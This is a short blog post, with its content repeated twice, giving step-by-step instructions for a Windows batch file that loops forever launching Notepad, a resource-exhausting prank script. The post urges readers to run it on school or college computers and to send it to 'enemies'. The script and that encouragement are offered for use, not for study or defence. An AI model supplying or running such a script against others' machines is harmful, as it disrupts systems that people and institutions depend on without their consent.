How To Open Notepad Continuously.
Step 1 >> Open Notepad.
Step 2 >> Copy This Code.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Step 3>> Paste It.
Step 4>> Save As Notepad.bat(.Bat is Must)
Now double clicking the file will open the notepad continuously.
Try this in your college or school system.
Or send to your enemies.
Step 1 >> Open Notepad.
Step 2 >> Copy This Code.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Step 3>> Paste It.
Step 4>> Save As Notepad.bat(.Bat is Must)
Now double clicking the file will open the notepad continuously.
Try this in your college or school system.
Or send to your enemies.
0 comments:
Post a Comment